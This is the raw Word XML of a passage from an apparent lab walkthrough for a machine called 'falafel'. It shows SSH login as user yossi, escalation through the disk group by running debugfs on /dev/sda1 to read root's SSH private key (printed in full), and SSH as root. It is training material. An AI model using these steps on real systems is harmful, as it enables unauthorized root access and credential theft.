        <w:t>https://rawpixels.net/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC11FE8" w14:textId="667B1176" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F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629F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A02B54" w14:textId="14E677E8" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F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629F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Right pixel size needs to be selected to properly render the image and view the contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A59BFD3" w14:textId="4D6E4028" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F7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752DFB1" w14:textId="217C93B1" w:rsidR="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F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Using the steps above we can find the pixel, extract password for Yossi user, we can direct SSH into the machine using the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D47AC2B" w14:textId="77777777" w:rsidR="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="433AAE90" w14:textId="7AA97599" w:rsidR="003629F7" w:rsidRPr="00C40787" w:rsidRDefault="003629F7" w:rsidP="003629F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Once we login as YOSSI user, use id command to check the permission, so we found he is part of </w:t>
      </w:r>
      <w:r w:rsidRPr="00C40787">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B4481E" w14:textId="6F740402" w:rsidR="00C40787" w:rsidRDefault="00C40787" w:rsidP="00C40787">
      <w:pPr>
        <w:pStyle w:val="ListParagrap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pacing w:val="-5"/>
        </w:rPr>
        <w:t>uid=1000(yossi) gid=1000(yossi) groups=1000(yossi),4(adm),6(disk),24(cdrom),30(dip),46(plugdev),117(lpadmin),118(sambashare)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52116DF6" w14:textId="6186B969" w:rsidR="00C40787" w:rsidRPr="003629F7" w:rsidRDefault="00C40787" w:rsidP="00C40787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46636C62" w14:textId="05F646EF" w:rsidR="009E2D0F" w:rsidRDefault="009E2D0F" w:rsidP="009E2D0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40BF0E0" w14:textId="53E72A57" w:rsidR="00C40787" w:rsidRDefault="00C40787" w:rsidP="00C4078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26D51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Also,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> we need to check the disk directory</w:t>
      </w:r>
      <w:r w:rsidR="00F26D51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> files and its permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is /dev/sda1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665028D0" w14:textId="62D5BA76" w:rsidR="00F26D51" w:rsidRDefault="00F26D51" w:rsidP="00F26D51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5F1FF4" w14:textId="5315E47E" w:rsidR="00F26D51" w:rsidRDefault="00F26D51" w:rsidP="00F26D51">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:spacing w:val="-5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r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>yossi@falafel:~$ ls -la /dev/sda1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>brw-rw---- 1 root disk 8, 1 Jan 30 19:49 /dev/sda1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EB8C3F" w14:textId="2C6FF187" w:rsidR="00F26D51" w:rsidRDefault="00F26D51" w:rsidP="00F26D51">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D919B10" w14:textId="1AFC76A4" w:rsidR="00F26D51" w:rsidRPr="00F26D51" w:rsidRDefault="00F26D51" w:rsidP="00F26D51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26D51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We can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00F26D51">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/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debugfs</w:t>
      </w:r>
      <w:r w:rsidRPr="00F26D51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 to enumerate the entire disk with effectively root level privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62603982" w14:textId="208B1874" w:rsidR="00F26D51" w:rsidRDefault="00F26D51" w:rsidP="00F26D51">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/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</w:pPr>
    </w:p>
    <w:p w14:paraId="1335E705" w14:textId="66A22964" w:rsidR="00F26D51" w:rsidRDefault="00F26D51" w:rsidP="00F26D51">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
      </w:pPr>
      <w:r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 xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>yossi@falafel:~$ debugfs /dev/sda1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>debugfs 1.42.13 (17-May-2015)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>debugfs: cd /root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>debugfs: ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>debugfs: cd .ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>debugfs: ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>debugfs: cat id_rsa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>-----BEGIN RSA PRIVATE KEY-----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MIIEpAIBAAKCAQEAyPdlQuyVr/L4xXiDVK8lTn88k4zVEEfiRVQ1AWxQPOHY7q0h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>b+Zd6WPVczObUnC+TaElpDXhf3gjLvjXvn7qGuZekNdB1aoWt5IKT90yz9vUx/gf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>v22+b8XdCdzyXpJW0fAmEN+m5DAETxHDzPdNfpswwYpDX0gqLCZIuMC7Z8D8Wpkg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>BWQ5RfpdFDWvIexRDfwj/Dx+tiIPGcYtkpQ/UihaDgF0gwj912Zc1N5+0sILX/Qd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>UQ+ZywP/qj1FI+ki/kJcYsW/5JZcG20xS0QgNvUBGpr+MGh2urh4angLcqu5b/ZV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>dmoHaOx/UOrNywkp486/SQtn30Er7SlM29/8PQIDAQABAoIBAQCGd5qmw/yIZU/1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>eWSOpj6VHmee5q2tnhuVffmVgS7S/d8UHH3yDLcrseQhmBdGey+qa7fu/ypqCy2n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>gVOCIBNuelQuIAnp+EwI+kuyEnSsRhBC2RANG1ZAHal/rvnxM4OqJ0ChK7TUnBhV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>+7IClDqjCx39chEQUQ3+yoMAM91xVqztgWvl85Hh22IQgFnIu/ghav8Iqps/tuZ0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>/YE1+vOouJPD894UEUH5+Bj+EvBJ8+pyXUCt7FQiidWQbSlfNLUWNdlBpwabk6Td</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>OnO+rf/vtYg+RQC+Y7zUpyLONYP+9S6WvJ/lqszXrYKRtlQg+8Pf7yhcOz/n7G08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>kta/3DH1AoGBAO0itIeAiaeXTw5dmdza5xIDsx/c3DU+yi+6hDnV1KMTe3zK/yjG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>UBLnBo6FpAJr0w0XNALbnm2RToX7OfqpVeQsAsHZTSfmo4fbQMY7nWMvSuXZV3lG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>ahkTSKUnpk2/EVRQriFjlXuvBoBh0qLVhZIKqZBaavU6iaplPVz72VvLAoGBANj0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>GcJ34ozu/XuhlXNVlm5ZQqHxHkiZrOU9aM7umQkGeM9vNFOwWYl6l9g4qMq7ArMr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>5SmT+XoWQtK9dSHVNXr4XWRaH6aow/oazY05W/BgXRMxolVSHdNE23xuX9dlwMPB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>f/y3ZeVpbREroPOx9rZpYiE76W1gZ67H6TV0HJcXAoGBAOdgCnd/8lAkcY2ZxIva</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>xsUr+PWo4O/O8SY6vdNUkWIAm2e7BdX6EZ0v75TWTp3SKR5HuobjVKSht9VAuGSc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>HuNAEfykkwTQpFTlmEETX9CsD09PjmsVSmZnC2Wh10FaoYT8J7sKWItSzmwrhoM9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>BVPmtWXU4zGdST+KAqKcVYubAoGAHR5GBs/IXFoHM3ywblZiZlUcmFegVOYrSmk/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>k+Z6K7fupwip4UGeAtGtZ5vTK8KFzj5p93ag2T37ogVDn1LaZrLG9h0Sem/UPdEz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>HW1BZbXJSDY1L3ZiAmUPgFfgDSze/mcOIoEK8AuCU/ejFpIgJsNmJEfCQKfbwp2a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>M05uN+kCgYBq8iNfzNHK3qY+iaQNISQ657Qz0sPoMrzQ6gAmTNjNfWpU8tEHqrCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>NZTQDYCA31J/gKIl2BT8+ywQL50avvbxcXZEsy14ExVnaTpPQ9m2INlxz97YLxjZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>FEUbkAlzcvN/S3LJiFbnkQ7uJ0nPj4oPw1XBcmsQoBwPFOcCEvHSrg==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>-----END RSA PRIVATE KEY-----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
        <w:t>debugfs: quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761AC488" w14:textId="7BF29920" w:rsidR="00F26D51" w:rsidRDefault="00F26D51" w:rsidP="00F26D51">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24E96D6B" w14:textId="77777777" w:rsidR="00F26D51" w:rsidRPr="00F26D51" w:rsidRDefault="00F26D51" w:rsidP="00F26D5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C004E4D" w14:textId="77777777" w:rsidR="00F26D51" w:rsidRPr="00F26D51" w:rsidRDefault="00F26D51" w:rsidP="00F26D51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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F26D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Save the RSA private key in the file </w:t>
      </w:r>
      <w:r w:rsidRPr="00F26D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root_id_rsa </w:t>
      </w:r>
      <w:r w:rsidRPr="00F26D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on the attack machine and change the permissions on the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1352D81E" w14:textId="77777777" w:rsidR="00F26D51" w:rsidRDefault="00F26D51" w:rsidP="00F26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pacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C88597" w14:textId="7F8E9005" w:rsidR="00F26D51" w:rsidRPr="00F26D51" w:rsidRDefault="00F26D51" w:rsidP="00F26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pacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="00F26D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>chmod 600 root_id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CAE165" w14:textId="2BDF5E8F" w:rsidR="00194085" w:rsidRDefault="00194085" w:rsidP="00F26D51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="333B65C6" w14:textId="04E74D65" w:rsidR="00F26D51" w:rsidRDefault="00B821B8" w:rsidP="00F26D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SSH into root using RSA private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3890CCC5" w14:textId="1C769274" w:rsidR="00B821B8" w:rsidRDefault="00B821B8" w:rsidP="00B821B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i root_id_rsa </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="007902AF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:spacing w:val="-5"/>
          </w:rPr>
          <w:t>root@10.10.10.73</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CD21E8D" w14:textId="0BDD2F21" w:rsidR="00B821B8" w:rsidRDefault="00B821B8" w:rsidP="00B821B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F65C74D" w14:textId="6A839461" w:rsidR="00B821B8" w:rsidRPr="00B821B8" w:rsidRDefault="00B821B8" w:rsidP="00B821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we got root access and we can find root.txt in /root/root.txt</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1629721B" w14:textId="2B540CF9" w:rsidR="009E2D0F" w:rsidRPr="009E2D0F" w:rsidRDefault="009E2D0F" w:rsidP="009E2D0F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6276D2D6" w14:textId="77777777" w:rsidR="00A65E06" w:rsidRDefault="00A65E06"/>
    <w:p w14:paraId="5046295B" w14:textId="77777777" w:rsidR="00A65E06" w:rsidRDefault="00A65E06"/>
    <w:sectPr w:rsidR="00A6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A2BFD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B6E61860"/>
    <w:lvl w:ilvl="0" w:tplc="6E82DB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A6B5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B6E61860"/>
    <w:lvl w:ilvl="0" w:tplc="6E82DB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360F"/>
    <w:rsid w:val="0005360F"/>
    <w:rsid w:val="0016568B"/>
    <w:rsid w:val="00194085"/>
    <w:rsid w:val="003629F7"/>
    <w:rsid w:val="00507D05"/>
    <w:rsid w:val="009E2D0F"/>
    <w:rsid w:val="00A65E06"/>
    <w:rsid w:val="00AB6307"/>
    <w:rsid w:val="00B821B8"/>
    <w:rsid w:val="00C40787"/>
    <w:rsid w:val="00CB2B54"/>
    <w:rsid w:val="00E233B8"/>
    <w:rsid w:val="00F26D51"/>
    <w:rsid w:val="00F5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7A4F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4E0DC601-31C1-4631-A181-F7A1EB98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E06"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-en">
    <w:name w:val="pl-en"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E233B8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E233B8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E233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085"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hx">
    <w:name w:val="hx"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009E2D0F"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009E2D0F"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="gl">
    <w:name w:val="gl"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0036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6D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0.10.10.7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sche@10.10.10.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wisskyrepo/PayloadsAllTheThings/tree/master/Type%20Juggl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Neelamegha Kannan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Subramanian, Neelamegha Kannan</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-21T22:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-22T11:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>